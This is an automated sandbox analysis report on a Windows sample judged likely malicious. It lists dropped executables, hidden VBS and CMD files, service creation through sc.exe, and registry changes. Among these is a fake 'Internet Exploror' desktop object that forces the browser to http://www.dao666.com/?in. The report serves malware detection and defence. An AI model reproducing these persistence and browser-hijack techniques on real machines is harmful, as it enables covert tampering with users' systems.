Analysis Overview
SHA256
585096007cf202b245bd6b1e891142e4d2603addbd09e23b2fec98487ccd7fcd
Threat Level: Likely malicious
The file 8a903fdc2c88d4b47405519f174877cd_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Creates new service(s)
Sets file to hidden
Checks computer location settings
Loads dropped DLL
Executes dropped EXE
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
System Location Discovery: System Language Discovery
Unsigned PE
System Service Discovery
Enumerates physical storage devices
Modifies Internet Explorer settings
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Runs net.exe
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-03 08:38
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-03 08:38
Reported
2024-11-03 08:41
Platform
win7-20240903-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Creates new service(s)
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WinWare\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WinWare\36OSE.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\360.cmd | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Program Files\WinWare\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WinWare\361.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WinWare\360SE.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\Windows\360SE.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows\36OSE.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows\360SE.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\Windows\36OSE.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\tool.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\361.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WinWare\Internet Exploror.lnk | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\Internet Exploror.lnk | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\tool.cmd | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\361.cmd | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Program Files\WinWare\tool.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WinWare\360.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\360.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\360SE.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\36OSE.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Mail\UltraEdit\is.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Windows\Mail\UltraEdit\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\Mail\UltraEdit\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Windows\Mail\UltraEdit\is.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
System Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net1.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "436784982" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80e96ed8cb2ddb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{01C80E11-99BF-11EF-AE26-F245C6AC432F} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000953bd8210872ea40aad5946cc0771cd30000000002000000000010660000000100002000000010c5695741e4777f9a85265f4e917cfd5e381a43437b548024ab26ae05e27f73000000000e800000000200002000000080f7850ca96559934337b57b14948c664c9aa134c7a8c3134d57094bb14a735090000000f8a83d34876d0377331f7b3aaffdec44d514808de27349ab2ff4832bfd62f6bcc7dfbae97af46d1080101ba30c29dbc17c45633195bbf5916dc9b8e61f05ed5375709d7697543fef6496a719cc1c9c610a7fc9c8f9e30cf857bfb0d83e969ed2a74080bc6d2d38852c5c7a735efd87d7d1eda54e29ff0b8100bbdba66006551b6218f1f4fbffb6d80635c0c048c39c30400000008b393a277840410602efccc2092ae37f546502991ddc5c6025c0ac536ebcaa691e13fe2c9fd347163c00a137b281cd658883802ea1e0286c9cb91adc196691fd | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000953bd8210872ea40aad5946cc0771cd300000000020000000000106600000001000020000000dfd0e906f6c4f1f7425685b905a494bcdca0e5bf98f81852052b6c5a83afef4a000000000e8000000002000020000000f441080505ebb0b5c697da53d10cad9d13072ea50b3a33b95ee85c21668613f420000000e5af3a92eec49cb1b26511ba37a4bfbd66361b5e7d8eb6e305056285267680a240000000df31d8c1e17892500707999abbdd45ff76831c8c3b2dcf54def2e7d43c9d9f1c655bcf1fa969b84132b2e5fae51c8e4726ba373a6297101dd32ef70824249f7f | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ = "┤≥┐¬╓≈╥│(&H)" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Exploror" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideOnDesktopPerUser | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InfoTip = "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://www.dao666.com/?in" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
